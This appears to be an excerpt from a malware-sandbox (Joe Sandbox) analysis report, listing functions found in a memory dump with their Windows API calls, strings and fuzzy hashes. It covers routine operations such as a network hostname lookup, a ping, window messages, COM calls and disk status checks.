Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 4772bdfc6042a79544c18e96c784696a7b625660d6b3c879bfc28cab27d8635f
Instruction ID: d01c46373b6f5c0bc04a5caf308f77820d28e932fde4301c38ca4f8ef8743f59
Opcode Fuzzy Hash: 4772bdfc6042a79544c18e96c784696a7b625660d6b3c879bfc28cab27d8635f
Instruction Fuzzy Hash: D8318F31111115ABEF21AFA4EC49FDA3B69FF0E760F110215FA1AA60E0CB31D821DB64

Function 00266F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00266F1D
gethostname.WSOCK32(?,00000100), ref: 00266F37
gethostbyname.WSOCK32(?), ref: 00266F44
_wcscpy.LIBCMT ref: 00266F6C
inet_ntoa.WSOCK32(?), ref: 00266F8A
_strcat.LIBCMT ref: 00266F98
_wcscpy.LIBCMT ref: 00266FAF
WSACleanup.WSOCK32 ref: 00266FBD
_wcscpy.LIBCMT ref: 00266FCB

Strings

0.0.0.0, xrefs: 00266F66

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 2daaa5b3e911f8b34b9d2f346d611398d246a6fa33f553de89c874dbfeb1c214
Instruction ID: aa13e5293e57b934f57d181fd20457731a72f4bc767d93dbee9a66161239bf92
Opcode Fuzzy Hash: 2daaa5b3e911f8b34b9d2f346d611398d246a6fa33f553de89c874dbfeb1c214
Instruction Fuzzy Hash: 1C11E472924215ABDB28AB70EC4EEDA77ACEF45710F00006AF106A6481EF709AE58B51

Function 0024500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00245047

Part of subcall function 00247C0E: __getptd_noexit.LIBCMT ref: 00247C0E

__gmtime64_s.LIBCMT ref: 002450E0
__gmtime64_s.LIBCMT ref: 00245116
__gmtime64_s.LIBCMT ref: 00245133
__allrem.LIBCMT ref: 00245189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002451A5
__allrem.LIBCMT ref: 002451BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002451DA
__allrem.LIBCMT ref: 002451F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0024520F
__invoke_watson.LIBCMT ref: 00245280

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: c46f4ff06f65aec1671864ddff81e8bf97a39b5196b596f7638038b429da1ab2
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 92712B71A10F27ABE718DE78CC41B6A73A8AF04764F14422AF854D7282E7B0DD648BD0

Function 00264DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00264DF8
GetMenuItemInfoW.USER32(002E1708,000000FF,00000000,00000030), ref: 00264E59
SetMenuItemInfoW.USER32(002E1708,00000004,00000000,00000030), ref: 00264E8F
Sleep.KERNEL32(000001F4), ref: 00264EA1
GetMenuItemCount.USER32(?), ref: 00264EE5
GetMenuItemID.USER32(?,00000000), ref: 00264F01
GetMenuItemID.USER32(?,-00000001), ref: 00264F2B
GetMenuItemID.USER32(?,?), ref: 00264F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00264FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00264FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00264FEB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 7724c5b7120259fff2d7a9769f83a2deb707c6cb6d34dd0d05b7076a6845ecdc
Instruction ID: 6626374546effd9fa6d0357a38f38ddaa8f19795e2177dfcbbec6866d094ce92
Opcode Fuzzy Hash: 7724c5b7120259fff2d7a9769f83a2deb707c6cb6d34dd0d05b7076a6845ecdc
Instruction Fuzzy Hash: 6C61C6B192029AEFDB20EFA4DC88DBE7BB8FB05304F140159F58297651D7719DA4CB20

Function 00289C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00289C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00289C9B
GetWindowLongW.USER32(?,000000F0), ref: 00289CBF
_memset.LIBCMT ref: 00289CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00289CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00289D5A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: c4c22a9c16d8934f6aa78fbf45821e614055748c5a550c118f0173d8f20c245f
Instruction ID: 555dbf11475164a30e9fa0bb8e907a4d3928deb93aa6688342975e5945cf824e
Opcode Fuzzy Hash: c4c22a9c16d8934f6aa78fbf45821e614055748c5a550c118f0173d8f20c245f
Instruction Fuzzy Hash: 03618C79910248AFDB10EFA8DC81EFE77B8EB09700F14416AFA05A72D1D770ADA1DB50

Function 002594E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 002594FE
SafeArrayAllocData.OLEAUT32(?), ref: 00259549
VariantInit.OLEAUT32(?), ref: 0025955B
SafeArrayAccessData.OLEAUT32(?,?), ref: 0025957B
VariantCopy.OLEAUT32(?,?), ref: 002595BE
SafeArrayUnaccessData.OLEAUT32(?), ref: 002595D2
VariantClear.OLEAUT32(?), ref: 002595E7
SafeArrayDestroyData.OLEAUT32(?), ref: 002595F4
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002595FD
VariantClear.OLEAUT32(?), ref: 0025960F
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0025961A

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: f99d5790dcb43415cb3b98b424082de763e249e828f6fd37c6e4f965f3275de2
Instruction ID: e859ba0e1766aa2e9e8bf042b7effe540e79a1fca7432ae4c032dedc737bbfda
Opcode Fuzzy Hash: f99d5790dcb43415cb3b98b424082de763e249e828f6fd37c6e4f965f3275de2
Instruction Fuzzy Hash: 75414C75910219EFCB01EFA4D8489DEBB79FF08355F008065F902A3251DB30EA99CFA4

Function 0027BB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0027BB5C
VariantInit.OLEAUT32(?), ref: 0027BC2D
VariantInit.OLEAUT32(?), ref: 0027BD2E
VariantClear.OLEAUT32(?), ref: 0027BD38
VariantClear.OLEAUT32(?), ref: 0027BD99

Strings

h?-, xrefs: 0027BB2D
|?-, xrefs: 0027BB34
Incorrect Object type in FOR..IN loop, xrefs: 0027BD11
Null Object assignment in FOR..IN loop, xrefs: 0027BBBD, 0027BCEB, 0027BDA7

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?-$|?-
API String ID: 2862541840-1036787664
Opcode ID: c61eebb298cf092621c600e64f9208d0ea8675e648846482245bb5309a6f61c5
Instruction ID: 6ebcef66f57e1eecc21b6af019a3501cd15f0639eff9ca6025103c7a730dec7d
Opcode Fuzzy Hash: c61eebb298cf092621c600e64f9208d0ea8675e648846482245bb5309a6f61c5
Instruction Fuzzy Hash: 5F918171A20219AFDF26CF95C844FAEB7B8EF45710F10C55AF919AB280DB709954CFA0

Function 0027ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 0022936C: __swprintf.LIBCMT ref: 002293AB
Part of subcall function 0022936C: __itow.LIBCMT ref: 002293DF

CoInitialize.OLE32 ref: 0027ADF6
CoUninitialize.OLE32 ref: 0027AE01
CoCreateInstance.OLE32(?,00000000,00000017,002AD8FC,?), ref: 0027AE61
IIDFromString.OLE32(?,?), ref: 0027AED4
VariantInit.OLEAUT32(?), ref: 0027AF6E
VariantClear.OLEAUT32(?), ref: 0027AFCF

Strings

Invalid parameter, xrefs: 0027AEED
Failed to create object, xrefs: 0027AE6C, 0027AF22
NULL Pointer assignment, xrefs: 0027AEA6

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 38748bd2fdad513e33817931b6a700149005229d8fc8da54ef2bdc61d64d793a
Instruction ID: 1d9b77aa06038e6bea89292f968543eb32edec8ac603fe9e2c80231126e9fe8d
Opcode Fuzzy Hash: 38748bd2fdad513e33817931b6a700149005229d8fc8da54ef2bdc61d64d793a
Instruction Fuzzy Hash: 5561BE70228312AFD711DF54D848B6FB7E8AF89724F008419F98A9B291C770ED64CB93

Function 00278107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00278168
inet_addr.WSOCK32(?,?,?), ref: 002781AD
gethostbyname.WSOCK32(?), ref: 002781B9
IcmpCreateFile.IPHLPAPI ref: 002781C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00278237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0027824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 002782C2
WSACleanup.WSOCK32 ref: 002782C8

Strings

Ping, xrefs: 002781EB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 47d041e4aa18a0bd3b337afbab62472a5cb7e6f74f17a5568f56aca8cb1c9f77
Instruction ID: 31887ab8cf9443e95f0dc5ed3435269fb2080aa524b0fe4c12308e00acedd406
Opcode Fuzzy Hash: 47d041e4aa18a0bd3b337afbab62472a5cb7e6f74f17a5568f56aca8cb1c9f77
Instruction Fuzzy Hash: A851A131664701AFD710EF64DC49B2ABBE4AF49710F04892AFA5ADB2A1DF70E815CF41

Function 0026E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0026E396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0026E40C
GetLastError.KERNEL32 ref: 0026E416
SetErrorMode.KERNEL32(00000000,READY), ref: 0026E483

Strings

READY, xrefs: 0026E45C
INVALID, xrefs: 0026E455
NOTREADY, xrefs: 0026E442
READONLY, xrefs: 0026E44E
UNKNOWN, xrefs: 0026E43B

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 9067acdf38f6a48d74d5b4c4083b46e8b35a13cedbf44139a2bc134577b273dc
Instruction ID: 26c25d871ce89cb4c4cb2606350f5f01db2aa6110e75ea27288a3d1928b9ee8a
Opcode Fuzzy Hash: 9067acdf38f6a48d74d5b4c4083b46e8b35a13cedbf44139a2bc134577b273dc
Instruction Fuzzy Hash: 67318639A20206AFDF01EFB4D889ABDB7B4EF45300F158056E505EB291DF709DA1CB91

Function 0025B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0025B98C
GetDlgCtrlID.USER32 ref: 0025B997
GetParent.USER32 ref: 0025B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0025B9B6
GetDlgCtrlID.USER32(?), ref: 0025B9BF
GetParent.USER32(?), ref: 0025B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0025B9DE

Strings

ListBox, xrefs: 0025B949
ComboBox, xrefs: 0025B911

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 47c5dedf20dea98e42fb947e57a9fd3cbbfb0201f9750d718419265eb45c6f80
Instruction ID: 289abaa38c9370deaa633f57c08b6f122780dceb9c6a9efcdfcfea81874f4f06
Opcode Fuzzy Hash: 47c5dedf20dea98e42fb947e57a9fd3cbbfb0201f9750d718419265eb45c6f80
Instruction Fuzzy Hash: FB21A474910104BFDB05AFA4EC85EFEB779EB56301B100115F952972A1DBB45829DF24

Function 0025B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0025BA73
GetDlgCtrlID.USER32 ref: 0025BA7E
GetParent.USER32 ref: 0025BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0025BA9D
GetDlgCtrlID.USER32(?), ref: 0025BAA6
GetParent.USER32(?), ref: 0025BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0025BAC5

Strings

ListBox, xrefs: 0025BA32
ComboBox, xrefs: 0025B9FA

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 20b25263a5ef88b962f5446845279a3fb9ece76af57ffc8ed04d5f6b1ddfd0c7
Instruction ID: c1543d43a777a2e7b44531ab8beb3e7998fd9dba733e9f95a2066522d79969c0
Opcode Fuzzy Hash: 20b25263a5ef88b962f5446845279a3fb9ece76af57ffc8ed04d5f6b1ddfd0c7
Instruction Fuzzy Hash: 4F21C2B4A10108BFDB05AFA4EC85EFEBB79EF45301F100015F952A72A1DBB55929DF24

Function 0025BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0025BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 0025BAF8
_wcscmp.LIBCMT ref: 0025BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0025BB85

Strings

details, xrefs: 0025BB33
list, xrefs: 0025BB67
largeicons, xrefs: 0025BB19
smallicons, xrefs: 0025BB4D
SHELLDLL_DefView, xrefs: 0025BB04

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: cf98a38c95222c6103bd1ef9b05ebb26d944a9523c0d50fb9d9e6eacdd2ed6df
Instruction ID: 4acea1dec655178b42661bdf6be937b65b00a350a10f5cdedc3cbee32cd3a8d5
Opcode Fuzzy Hash: cf98a38c95222c6103bd1ef9b05ebb26d944a9523c0d50fb9d9e6eacdd2ed6df
Instruction Fuzzy Hash: DB11E776638703FAFA256A25AC06DA6379CDB22728B200022FE05E44D5EFF15C794918

Function 0027B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0027B2D5
CoInitialize.OLE32(00000000), ref: 0027B302
CoUninitialize.OLE32 ref: 0027B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0027B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0027B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0027B56D
CoGetObject.OLE32(?,00000000,002AD91C,?), ref: 0027B590
SetErrorMode.KERNEL32(00000000), ref: 0027B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0027B623
VariantClear.OLEAUT32(002AD91C), ref: 0027B633

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: b73b5b39b1f18e93b01dc83bf01fc09f3545bb029093dbff1355901d89ad094c
Instruction ID: 41427282fa44e3c14fb8682ccdc3830f7f2a2e2f05638dc4201eb218e6e80a6d
Opcode Fuzzy Hash: b73b5b39b1f18e93b01dc83bf01fc09f3545bb029093dbff1355901d89ad094c
Instruction Fuzzy Hash: EEC132B1618301AFC701DF68C894A6BB7E9BF89308F00895DF98ADB251DB70ED55CB52

Function 0029DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0023B496
SetTextColor.GDI32(?,000000FF), ref: 0023B4A0
SetBkMode.GDI32(?,00000001), ref: 0023B4B5
GetStockObject.GDI32(00000005), ref: 0023B4BD
GetClientRect.USER32(?), ref: 0029DD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 0029DD7A
GetWindowDC.USER32(?), ref: 0029DD86
GetPixel.GDI32(00000000,?,?), ref: 0029DD95
ReleaseDC.USER32(?,00000000), ref: 0029DDA7
GetSysColor.USER32(00000005), ref: 0029DDC5

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: f954fa84bdbc6c61b1b2268280d2a537ea4b5f0781a61811fb38001ac43c9e32
Instruction ID: 64b744229c174347bfcc6d70dcb36d3de0be12b0859115ee0215bbd746540d2f
Opcode Fuzzy Hash: f954fa84bdbc6c61b1b2268280d2a537ea4b5f0781a61811fb38001ac43c9e32
Instruction Fuzzy Hash: 4A11A971510201EFDB212FB0FC0CBE93B65EB06321F508225FA6A954E2CF320951EF20

Function 00223093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002230DC
CoUninitialize.OLE32(?,00000000), ref: 00223181
UnregisterHotKey.USER32(?), ref: 002232A9
DestroyWindow.USER32(?), ref: 00295079
FreeLibrary.KERNEL32(?), ref: 002950F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00295125

Strings

close all, xrefs: 002230D7

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
